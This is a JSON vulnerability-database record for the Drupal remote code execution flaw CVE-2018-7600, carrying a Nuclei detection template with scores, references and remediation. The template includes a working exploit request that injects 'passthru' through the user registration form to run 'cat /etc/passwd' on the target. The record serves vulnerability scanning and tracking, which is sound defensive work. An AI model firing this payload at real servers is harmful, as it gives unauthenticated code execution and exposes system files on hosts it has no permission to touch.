{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2018-7600/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2018-7600/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2018-7600/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2018-7600/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2018-7600/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2018-7600"},"sightings":{"href":"/api/v1/sightings/cve-2018-7600"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2018/CVE-2018-7600.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2018-7600\n\ninfo:\n  name: Drupal - Remote Code Execution\n  author: pikpikcu,diedromeo\n  severity: critical\n  description: |\n    Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.\n  impact: |\n    Successful exploitation allows an unauthenticated attacker to execute arbitrary code on the server, leading to full compromise of the Drupal host and its data.\n  remediation: |\n    Upgrade to the latest version of Drupal or apply the official patch provided by the Drupal security team.\n  reference:\n    - https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2018-7600\n    - https://nvd.nist.gov/vuln/detail/CVE-2018-7600\n    - https://www.drupal.org/sa-core-2018-002\n    - https://groups.drupal.org/security/faq-2018-002\n    - http://www.securitytracker.com/id/1040598\n  classification:\n    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2018-7600\n    cwe-id: CWE-20\n    epss-score: 0.99991\n    epss-percentile: 0.99985\n    cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: drupal\n    product: drupal\n    shodan-query: http.component:\"drupal\"\n    fofa-query: app=\"drupal\"\n  tags: cve,cve2018,drupal,rce,kev,vulhub,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1\n        Host: {{Hostname}}\n        Accept: application/json\n        Referer: {{Hostname}}/user/register\n        X-Requested-With: XMLHttpRequest\n        Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663\n\n        -----------------------------99533888113153068481322586663\n        Content-Disposition: form-data; name=\"mail[#post_render][]\"\n\n        passthru\n        -----------------------------99533888113153068481322586663\n        Content-Disposition: form-data; name=\"mail[#type]\"\n\n        markup\n        -----------------------------99533888113153068481322586663\n        Content-Disposition: form-data; name=\"mail[#markup]\"\n\n        cat /etc/passwd\n        -----------------------------99533888113153068481322586663\n        Content-Disposition: form-data; name=\"form_id\"\n\n        user_register_form\n        -----------------------------99533888113153068481322586663\n        Content-Disposition: form-data; name=\"_drupal_ajax\"\n\n        1\n        -----------------------------99533888113153068481322586663--\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - \"root:.*:0:0:\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100d688c3dfcb6c71cb992936c64d653da053a8a82363a5291bd7b511c1f9756c6302206a7b22b4a72d2f8e415328791c25b2408e6aa182251a937bff7b20fd8aafc797:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2018-7600"}